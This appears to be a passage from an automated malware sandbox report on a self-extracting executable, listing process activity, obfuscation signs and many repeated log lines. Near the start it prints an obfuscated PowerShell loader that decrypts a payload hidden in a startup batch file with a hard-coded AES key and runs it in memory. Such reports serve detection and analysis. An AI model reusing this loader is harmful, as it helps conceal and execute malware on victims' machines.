'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

File is packed with WinRar

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6893593

Jump to behavior

PE file contains sections with non-standard names

Source: jcgLYlM4dg.exe

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A407F0 push ecx; ret	0_2_00A40803
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A3FEFC push eax; ret	0_2_00A3FF1A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07493826 push dword ptr [eax+eax*2-75h]; iretd	5_2_0749382C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_04DC0DA8 push esi; retf	11_2_04DC0DB2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_04DC11A3 push esp; retf	11_2_04DC11B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07B53570 push eax; retf	11_2_07B53589

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
